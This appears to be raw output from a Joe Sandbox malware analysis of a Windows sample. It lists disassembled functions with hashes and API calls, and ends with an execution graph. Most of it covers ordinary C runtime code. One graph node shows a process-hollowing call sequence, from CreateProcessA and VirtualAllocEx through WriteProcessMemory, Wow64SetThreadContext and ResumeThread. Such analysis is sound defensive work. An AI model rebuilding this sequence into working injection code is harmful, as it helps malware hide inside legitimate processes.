                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004EFE94
                                  • GetLastError.KERNEL32 ref: 004EFF37
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                  • String ID:
                                  • API String ID: 2112829910-0
                                  • Opcode ID: 6dc41918ec164c580fd539d78a02bb88d48213b3aa4c8054b13c784f82e14d47
                                  • Instruction ID: eaf9cfed4d8837e8b3ab6d5d58e42607f72c9e132bc8eb86a2c88be3b503de02
                                  • Opcode Fuzzy Hash: 6dc41918ec164c580fd539d78a02bb88d48213b3aa4c8054b13c784f82e14d47
                                  • Instruction Fuzzy Hash: D2D17A75D002889FCF15CFA9D8809EEBBB5FF09305F28412AE815EB352D734A94ACB54
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: AdjustPointer
                                  • String ID:
                                  • API String ID: 1740715915-0
                                  • Opcode ID: 3c8047494e52de9f7080a831b4815265c0db8d5ef36844bde10ed603a1c8e1b2
                                  • Instruction ID: 04ea8d7c0ea4293464038ca219eaf396d588cadbe48e38d9504ef881097a31e9
                                  • Opcode Fuzzy Hash: 3c8047494e52de9f7080a831b4815265c0db8d5ef36844bde10ed603a1c8e1b2
                                  • Instruction Fuzzy Hash: 61510471608682AFDB288F57D841B7F77A0FF40326F14446FE90147291E738AD81C798
                                  APIs
                                    • Part of subcall function 004F3BF4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,004F2B86,?,00000000,-00000008), ref: 004F3CA0
                                  • GetLastError.KERNEL32 ref: 004F4074
                                  • __dosmaperr.LIBCMT ref: 004F407B
                                  • GetLastError.KERNEL32(?,?,?,?), ref: 004F40B5
                                  • __dosmaperr.LIBCMT ref: 004F40BC
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                  • String ID:
                                  • API String ID: 1913693674-0
                                  • Opcode ID: 2ba76d05bed5c13c482d8f82f34f0bc8119cb5b35a34574fc24c47d84ec66e02
                                  • Instruction ID: 8d2ca3bee09998a4fb7326275f633948f6038073cffa0e413c2060efa8435c16
                                  • Opcode Fuzzy Hash: 2ba76d05bed5c13c482d8f82f34f0bc8119cb5b35a34574fc24c47d84ec66e02
                                  • Instruction Fuzzy Hash: 4121CB3160021DAFDB20AF66884193BB7ADEF80369700852FFB2597251DF39EC518B99
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7b66be9a7195db70a6d1b7dd68144820fca5678f65d2f36c84be637df288f90b
                                  • Instruction ID: 914be33d6597ce4a517c898bc12afbbc0cb37c646ee91efb53b846ecb35d68f0
                                  • Opcode Fuzzy Hash: 7b66be9a7195db70a6d1b7dd68144820fca5678f65d2f36c84be637df288f90b
                                  • Instruction Fuzzy Hash: D121DB31600285AFDB20AFA3DC8197B77ADEF4435A710451BF964D7292D738EC1097D4
                                  APIs
                                  • GetEnvironmentStringsW.KERNEL32 ref: 004F4FAE
                                    • Part of subcall function 004F3BF4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,004F2B86,?,00000000,-00000008), ref: 004F3CA0
                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004F4FE6
                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004F5006
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                  • String ID:
                                  • API String ID: 158306478-0
                                  • Opcode ID: e159bbae8bb1628cc52c4120cae1e481b04d26d5a49db3d708e60e6d53207812
                                  • Instruction ID: 5e67187e5d88a1466bd811c9b631ae57826167fd3343f3e8a72e40459302e984
                                  • Opcode Fuzzy Hash: e159bbae8bb1628cc52c4120cae1e481b04d26d5a49db3d708e60e6d53207812
                                  • Instruction Fuzzy Hash: 0E1104B190161E7FA6212BB35C8AC7F6DACDE8839A710042AF70191101EE6DDE1181BD
                                  APIs
                                  • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,004F81D1,00000000,00000001,00000000,00000000,?,004EFF8B,00000000,00000000,00000000), ref: 004F93EC
                                  • GetLastError.KERNEL32(?,004F81D1,00000000,00000001,00000000,00000000,?,004EFF8B,00000000,00000000,00000000,00000000,00000000,?,004F0512,00000000), ref: 004F93F8
                                    • Part of subcall function 004F93BE: CloseHandle.KERNEL32(FFFFFFFE,004F9408,?,004F81D1,00000000,00000001,00000000,00000000,?,004EFF8B,00000000,00000000,00000000,00000000,00000000), ref: 004F93CE
                                  • ___initconout.LIBCMT ref: 004F9408
                                    • Part of subcall function 004F9380: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004F93AF,004F81BE,00000000,?,004EFF8B,00000000,00000000,00000000,00000000), ref: 004F9393
                                  • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,004F81D1,00000000,00000001,00000000,00000000,?,004EFF8B,00000000,00000000,00000000,00000000), ref: 004F941D
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                  • String ID:
                                  • API String ID: 2744216297-0
                                  • Opcode ID: b9b9c3ef5c52fe0e15857cab96ffbec82864f2c8f33737a685ab64d8d9cba10a
                                  • Instruction ID: d7414af18fc3e646f14055554a090e62fea6866c3c2e98e207bd3c08a2844add
                                  • Opcode Fuzzy Hash: b9b9c3ef5c52fe0e15857cab96ffbec82864f2c8f33737a685ab64d8d9cba10a
                                  • Instruction Fuzzy Hash: 06F0AC36901258BBCF221FA5DC05AAA3F66FB593A1F044125FB1895260C6328D61EB98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: P0U$P0U
                                  • API String ID: 0-3449549966
                                  • Opcode ID: ca9aad07fad035ab716a8a0133d65e776106eeaf4b6faaa8fa7cc036d9b91919
                                  • Instruction ID: e101b1bd8ea445f20ea84009f98feb9fd137b4fa75a11d1365a22dda7d64c8d8
                                  • Opcode Fuzzy Hash: ca9aad07fad035ab716a8a0133d65e776106eeaf4b6faaa8fa7cc036d9b91919
                                  • Instruction Fuzzy Hash: 0AC16572D40209AFDB20DBA9CD82FFEB7F89F04744F144156FB04EB282D5B599418B64
                                  APIs
                                    • Part of subcall function 004EED98: HeapFree.KERNEL32(00000000,00000000,?,004F5DEB,?,00000000,?,?,004F608C,?,00000007,?,?,004F6585,?,?), ref: 004EEDAE
                                    • Part of subcall function 004EED98: GetLastError.KERNEL32(?,?,004F5DEB,?,00000000,?,?,004F608C,?,00000007,?,?,004F6585,?,?), ref: 004EEDB9
                                  • ___free_lconv_mon.LIBCMT ref: 004F6432
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: ErrorFreeHeapLast___free_lconv_mon
                                  • String ID: P0U$x1U
                                  • API String ID: 4068849827-3806253719
                                  • Opcode ID: 7ab9515fc4848c2d7415dd190a6b94de96821da76249544366dd94c4c7b59eae
                                  • Instruction ID: a38bc6c93d0bfb76ad8a89856fe3ab96a1312811629c3328b59126d3a80175ef
                                  • Opcode Fuzzy Hash: 7ab9515fc4848c2d7415dd190a6b94de96821da76249544366dd94c4c7b59eae
                                  • Instruction Fuzzy Hash: DF315E71600709AFEB21AA3ADC05B6777E9AF00719F15441FE248D7251DE79ED508B2C
                                  APIs
                                  • EncodePointer.KERNEL32(00000000,?), ref: 004E7FB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: EncodePointer
                                  • String ID: MOC$RCC
                                  • API String ID: 2118026453-2084237596
                                  • Opcode ID: 68aba8471a79af2f42dd709a78cab412eeb2652ce3b8ae7839b04ac8fc76934d
                                  • Instruction ID: 3c27b253f1e4662149a2195372bbe1c4de0b15c3151c4a2121bbfc13ac45f746
                                  • Opcode Fuzzy Hash: 68aba8471a79af2f42dd709a78cab412eeb2652ce3b8ae7839b04ac8fc76934d
                                  • Instruction Fuzzy Hash: A541AA72900249AFCF15DF96CC81AEEBBB1FF48315F19809AF908A7221D739A950CB54
                                  APIs
                                  • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,004E8A9D,00000002,FlsGetValue,004FEC68,FlsGetValue,00000000,?,004E792D,?,004E5C62), ref: 004E89A5
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004E89AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true
                                  • Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
                                  • Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd
                                  Similarity
                                  • API ID: AddressFreeLibraryProc
                                  • String ID: b\N
                                  • API String ID: 3013587201-863549587
                                  • Opcode ID: 7015a5cf9902318c450c73472416ccf57dc04eac4348ebae866a57c61bd489ba
                                  • Instruction ID: 39fbd0ef8c91503e8b91af9d02c912c34294a243d0e2c909b964886e94df285f
                                  • Opcode Fuzzy Hash: 7015a5cf9902318c450c73472416ccf57dc04eac4348ebae866a57c61bd489ba
                                  • Instruction Fuzzy Hash: A911B1B1A002559F8F22CF66DC909BA73A4FB49366714016EEA09D7311EF34DD02DB9B

                                  Execution Graph

                                  Execution Coverage:2.2%
                                  Dynamic/Decrypted Code Coverage:0.4%
                                  Signature Coverage:0%
                                  Total number of Nodes:1511
                                  Total number of Limit Nodes:24
                                  execution_graph 17225 bff7ad 17226 bff7b9 ___scrt_is_nonwritable_in_current_image 17225->17226 17237 bfa676 EnterCriticalSection 17226->17237 17228 bff7c0 17238 c054af 17228->17238 17231 bff7de 17262 bff804 17231->17262 17237->17228 17239 c054bb ___scrt_is_nonwritable_in_current_image 17238->17239 17240 c054c4 17239->17240 17241 c054e5 17239->17241 17242 bfb0d8 __dosmaperr 14 API calls 17240->17242 17265 bfa676 EnterCriticalSection 17241->17265 17244 c054c9 17242->17244 17245 bf8ecf __strnicoll 41 API calls 17244->17245 17246 bff7cf 17245->17246 17246->17231 17251 bff647 GetStartupInfoW 17246->17251 17247 c054f1 17250 c0551d 17247->17250 17266 c053ff 17247->17266 17273 c05544 17250->17273 17252 bff6f8 17251->17252 17253 bff664 17251->17253 17257 bff6fd 17252->17257 17253->17252 17254 c054af 42 API calls 17253->17254 17255 bff68c 17254->17255 17255->17252 17256 bff6bc GetFileType 17255->17256 17256->17255 17258 bff704 17257->17258 17259 bff747 GetStdHandle 17258->17259 17260 bff7a9 17258->17260 17261 bff75a GetFileType 17258->17261 17259->17258 17260->17231 17261->17258 17277 bfa6be LeaveCriticalSection 17262->17277 17264 bff7ef 17265->17247 17267 bfed3b __Getctype 14 API calls 17266->17267 17268 c05411 17267->17268 17270 bff380 6 API calls 17268->17270 17272 c0541e 17268->17272 17269 bfed98 ___free_lconv_mon 14 API calls 17271 c05473 17269->17271 17270->17268 17271->17247 17272->17269 17276 bfa6be LeaveCriticalSection 17273->17276 17275 c0554b 17275->17246 17276->17275 17277->17264 15022 bf10ac 15027 bf39bf 15022->15027 15028 bf39cf 15027->15028 15029 bf10b1 15027->15029 15028->15029 15034 bf424a InitializeCriticalSectionEx 15028->15034 15031 bf4a47 15029->15031 15035 bf4a1a 15031->15035 15034->15028 15036 bf4a29 15035->15036 15037 bf4a30 15035->15037 15041 bfdd2e 15036->15041 15044 bfddab 15037->15044 15040 bf10bb 15042 bfddab 44 API calls 15041->15042 15043 bfdd40 15042->15043 15043->15040 15047 bfdaf7 15044->15047 15048 bfdb03 ___scrt_is_nonwritable_in_current_image 15047->15048 15055 bfa676 EnterCriticalSection 15048->15055 15050 bfdb11 15056 bfdb52 15050->15056 15052 bfdb1e 15066 bfdb46 15052->15066 15055->15050 15057 bfdb6d 15056->15057 15058 bfdbe0 __Getctype 15056->15058 15057->15058 15059 bfdbc0 15057->15059 15069 c07960 15057->15069 15058->15052 15059->15058 15061 c07960 44 API calls 15059->15061 15063 bfdbd6 15061->15063 15062 bfdbb6 15064 bfed98 ___free_lconv_mon 14 API calls 15062->15064 15065 bfed98 ___free_lconv_mon 14 API calls 15063->15065 15064->15059 15065->15058 15097 bfa6be LeaveCriticalSection 15066->15097 15068 bfdb2f 15068->15040 15070 c07988 15069->15070 15071 c0796d 15069->15071 15073 c07997 15070->15073 15078 c0918f 15070->15078 15071->15070 15072 c07979 15071->15072 15074 bfb0d8 __dosmaperr 14 API calls 15072->15074 15085 c03966 15073->15085 15077 c0797e __fread_nolock 15074->15077 15077->15062 15079 c0919a 15078->15079 15080 c091af HeapSize 15078->15080 15081 bfb0d8 __dosmaperr 14 API calls 15079->15081 15080->15073 15082 c0919f 15081->15082 15083 bf8ecf __strnicoll 41 API calls 15082->15083 15084 c091aa 15083->15084 15084->15073 15086 c03973 15085->15086 15087 c0397e 15085->15087 15088 c01dc1 std::_Locinfo::_Locinfo_dtor 15 API calls 15086->15088 15089 c03986 15087->15089 15095 c0398f __Getctype 15087->15095 15093 c0397b 15088->15093 15090 bfed98 ___free_lconv_mon 14 API calls 15089->15090 15090->15093 15091 c03994 15094 bfb0d8 __dosmaperr 14 API calls 15091->15094 15092 c039b9 HeapReAlloc 15092->15093 15092->15095 15093->15077 15094->15093 15095->15091 15095->15092 15096 bfda13 ctype 2 API calls 15095->15096 15096->15095 15097->15068 15364 bf9094 15365 bf95ae ___scrt_uninitialize_crt 70 API calls 15364->15365 15366 bf909c 15365->15366 15374 bff55c 15366->15374 15368 bf90a1 15384 bff607 15368->15384 15371 bf90cb 15372 bfed98 ___free_lconv_mon 14 API calls 15371->15372 15373 bf90d6 15372->15373 15375 bff568 ___scrt_is_nonwritable_in_current_image 15374->15375 15388 bfa676 EnterCriticalSection 15375->15388 15377 bff573 15378 bff5df 15377->15378 15380 bff5b3 DeleteCriticalSection 15377->15380 15389 bf9273 15377->15389 15395 bff5fe 15378->15395 15383 bfed98 ___free_lconv_mon 14 API calls 15380->15383 15383->15377 15385 bff61e 15384->15385 15386 bf90b0 DeleteCriticalSection 15384->15386 15385->15386 15387 bfed98 ___free_lconv_mon 14 API calls 15385->15387 15386->15368 15386->15371 15387->15386 15388->15377 15390 bf9286 _Fputc 15389->15390 15398 bf914e 15390->15398 15392 bf9292 15393 bf8c0b _Fputc 41 API calls 15392->15393 15394 bf929e 15393->15394 15394->15377 15470 bfa6be LeaveCriticalSection 15395->15470 15397 bff5eb 15397->15368 15399 bf915a ___scrt_is_nonwritable_in_current_image 15398->15399 15400 bf9187 15399->15400 15401 bf9164 15399->15401 15403 bf917f 15400->15403 15409 bf9126 EnterCriticalSection 15400->15409 15402 bf8e52 _Deallocate 29 API calls 15401->15402 15402->15403 15403->15392 15405 bf91a5 15410 bf91e5 15405->15410 15407 bf91b2 15424 bf91dd 15407->15424 15409->15405 15411 bf9215 15410->15411 15412 bf91f2 15410->15412 15414 bf920d 15411->15414 15415 bf94e0 ___scrt_uninitialize_crt 66 API calls 15411->15415 15413 bf8e52 _Deallocate 29 API calls 15412->15413 15413->15414 15414->15407 15416 bf922d 15415->15416 15417 bff607 14 API calls 15416->15417 15418 bf9235 15417->15418 15419 bff839 __fread_nolock 41 API calls 15418->15419 15420 bf9241 15419->15420 15427 bff8f1 15420->15427 15423 bfed98 ___free_lconv_mon 14 API calls 15423->15414 15469 bf913a LeaveCriticalSection 15424->15469 15426 bf91e3 15426->15403 15428 bff91a 15427->15428 15429 bf9248 15427->15429 15430 bff969 15428->15430 15432 bff941 15428->15432 15429->15414 15429->15423 15431 bf8e52 _Deallocate 29 API calls 15430->15431 15431->15429 15434 bff860 15432->15434 15435 bff86c ___scrt_is_nonwritable_in_current_image 15434->15435 15442 c0554d EnterCriticalSection 15435->15442 15437 bff87a 15439 bff8ab 15437->15439 15443 bff994 15437->15443 15456 bff8e5 15439->15456 15442->15437 15444 c05624 __fread_nolock 41 API calls 15443->15444 15447 bff9a4 15444->15447 15445 bff9aa 15459 c05593 15445->15459 15447->15445 15449 c05624 __fread_nolock 41 API calls 15447->15449 15455 bff9dc 15447->15455 15448 c05624 __fread_nolock 41 API calls 15451 bff9e8 CloseHandle 15448->15451 15450 bff9d3 15449->15450 15452 c05624 __fread_nolock 41 API calls 15450->15452 15451->15445 15453 bff9f4 GetLastError 15451->15453 15452->15455 15453->15445 15454 bffa02 __fread_nolock 15454->15439 15455->15445 15455->15448 15468 c05570 LeaveCriticalSection 15456->15468 15458 bff8ce 15458->15429 15460 c055a2 15459->15460 15461 c05609 15459->15461 15460->15461 15467 c055cc 15460->15467 15462 bfb0d8 __dosmaperr 14 API calls 15461->15462 15463 c0560e 15462->15463 15464 bfb0c5 __dosmaperr 14 API calls 15463->15464 15465 c055f9 15464->15465 15465->15454 15466 c055f3 SetStdHandle 15466->15465 15467->15465 15467->15466 15468->15458 15469->15426 15470->15397 16306 bf101f 16307 bf1028 16306->16307 16314 bf22aa 16307->16314 16309 bf1037 16320 bf2b56 16309->16320 16312 bf4a47 44 API calls 16313 bf1055 16312->16313 16315 bf22b6 __EH_prolog3 16314->16315 16316 bf46d5 ctype 43 API calls 16315->16316 16317 bf22eb 16316->16317 16319 bf22fc ctype 16317->16319 16324 bf3bcf 16317->16324 16319->16309 16321 bf2b75 16320->16321 16323 bf104b 16321->16323 16431 bf90e0 16321->16431 16323->16312 16325 bf3bdb __EH_prolog3 16324->16325 16336 bf39ec 16325->16336 16330 bf3bf9 16348 bf3d55 16330->16348 16331 bf3c17 16358 bf3a44 16331->16358 16332 bf3c54 ctype 16332->16319 16337 bf39fb 16336->16337 16339 bf3a02 16336->16339 16365 bfa6d5 16337->16365 16340 bf3a00 16339->16340 16370 bf425f EnterCriticalSection 16339->16370 16340->16331 16342 bf3d32 16340->16342 16343 bf46d5 ctype 43 API calls 16342->16343 16344 bf3d3d 16343->16344 16345 bf3d51 16344->16345 16413 bf3a63 16344->16413 16345->16330 16349 bf3c01 16348->16349 16350 bf3d61 16348->16350 16352 bf3b27 16349->16352 16416 bf420d 16350->16416 16353 bf3b35 16352->16353 16357 bf3b60 ctype 16352->16357 16354 bf3b41 16353->16354 16355 bfa61a __freea 14 API calls 16353->16355 16356 bfa6ec _Yarn 15 API calls 16354->16356 16354->16357 16355->16354 16356->16357 16357->16331 16359 bf3a4e 16358->16359 16360 bfa6e3 16358->16360 16364 bf3a61 16359->16364 16429 bf426d LeaveCriticalSection 16359->16429 16430 bfa6be LeaveCriticalSection 16360->16430 16363 bfa6ea 16363->16332 16364->16332 16371 bff4db 16365->16371 16370->16340 16372 bfee8a std::_Locinfo::_Locinfo_dtor 5 API calls 16371->16372 16373 bff4e0 16372->16373 16374 bfeea4 std::_Locinfo::_Locinfo_dtor 5 API calls 16373->16374 16375 bff4e5 16374->16375 16392 bfeebe 16375->16392 16380 bfeef2 std::_Locinfo::_Locinfo_dtor 5 API calls 16381 bff4f4 16380->16381 16398 bfef0c 16381->16398 16391 bff50d 16391->16391 16393 bff073 __Getctype 5 API calls 16392->16393 16394 bfeed4 16393->16394 16395 bfeed8 16394->16395 16396 bff073 __Getctype 5 API calls 16395->16396 16397 bfeeee 16396->16397 16397->16380 16399 bff073 __Getctype 5 API calls 16398->16399 16400 bfef22 16399->16400 16401 bfef26 16400->16401 16402 bff073 __Getctype 5 API calls 16401->16402 16403 bfef3c 16402->16403 16404 bfef40 16403->16404 16405 bff073 __Getctype 5 API calls 16404->16405 16406 bfef56 16405->16406 16407 bfef74 16406->16407 16408 bff073 __Getctype 5 API calls 16407->16408 16409 bfef8a 16408->16409 16410 bfef5a 16409->16410 16411 bff073 __Getctype 5 API calls 16410->16411 16412 bfef70 16411->16412 16412->16391 16414 bf3b27 _Yarn 15 API calls 16413->16414 16415 bf3a9d 16414->16415 16415->16330 16417 bf421d EncodePointer 16416->16417 16418 bfaff7 16416->16418 16417->16349 16417->16418 16419 c02d4a __CreateFrameInfo 2 API calls 16418->16419 16420 bfaffc 16419->16420 16421 bfb007 16420->16421 16423 c02d8f __CreateFrameInfo 41 API calls 16420->16423 16422 bfb011 IsProcessorFeaturePresent 16421->16422 16428 bfb030 16421->16428 16424 bfb01d 16422->16424 16423->16421 16426 bf8cd3 __CreateFrameInfo 8 API calls 16424->16426 16425 bfc1ee __CreateFrameInfo 23 API calls 16427 bfb03a 16425->16427 16426->16428 16428->16425 16429->16364 16430->16363 16432 bf90ec 16431->16432 16436 bf9101 16431->16436 16433 bfb0d8 __dosmaperr 14 API calls 16432->16433 16434 bf90f1 16433->16434 16435 bf8ecf __strnicoll 41 API calls 16434->16435 16437 bf90fc 16435->16437 16436->16323 16437->16323 17822 bfe917 17823 bfe932 17822->17823 17824 bfe922 17822->17824 17828 bfe938 17824->17828 17827 bfed98 ___free_lconv_mon 14 API calls 17827->17823 17829 bfe94d 17828->17829 17830 bfe953 17828->17830 17832 bfed98 ___free_lconv_mon 14 API calls 17829->17832 17831 bfed98 ___free_lconv_mon 14 API calls 17830->17831 17833 bfe95f 17831->17833 17832->17830 17834 bfed98 ___free_lconv_mon 14 API calls 17833->17834 17835 bfe96a 17834->17835 17836 bfed98 ___free_lconv_mon 14 API calls 17835->17836 17837 bfe975 17836->17837 17838 bfed98 ___free_lconv_mon 14 API calls 17837->17838 17839 bfe980 17838->17839 17840 bfed98 ___free_lconv_mon 14 API calls 17839->17840 17841 bfe98b 17840->17841 17842 bfed98 ___free_lconv_mon 14 API calls 17841->17842 17843 bfe996 17842->17843 17844 bfed98 ___free_lconv_mon 14 API calls 17843->17844 17845 bfe9a1 17844->17845 17846 bfed98 ___free_lconv_mon 14 API calls 17845->17846 17847 bfe9ac 17846->17847 17848 bfed98 ___free_lconv_mon 14 API calls 17847->17848 17849 bfe9ba 17848->17849 17854 bfe764 17849->17854 17855 bfe770 ___scrt_is_nonwritable_in_current_image 17854->17855 17870 bfa676 EnterCriticalSection 17855->17870 17857 bfe77a 17858 bfe7a4 17857->17858 17861 bfed98 ___free_lconv_mon 14 API calls 17857->17861 17871 bfe7c3 17858->17871 17861->17858 17862 bfe7cf 17863 bfe7db ___scrt_is_nonwritable_in_current_image 17862->17863 17875 bfa676 EnterCriticalSection 17863->17875 17865 bfe7e5 17866 bfea05 __Getctype 14 API calls 17865->17866 17867 bfe7f8 17866->17867 17876 bfe818 17867->17876 17870->17857 17874 bfa6be LeaveCriticalSection 17871->17874 17873 bfe7b1 17873->17862 17874->17873 17875->17865 17879 bfa6be LeaveCriticalSection 17876->17879 17878 bfe806 17878->17827 17879->17878 14897 136018d 14900 13601c5 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 14897->14900 14899 13603a2 WriteProcessMemory 14901 13603e7 14899->14901 14900->14899 14902 13603ec WriteProcessMemory 14901->14902 14903 1360429 WriteProcessMemory Wow64SetThreadContext ResumeThread 14901->14903 14902->14901 16531 bf1000 16536 bf2242 16531->16536 16533 bf1013 16534 bf4a47 44 API 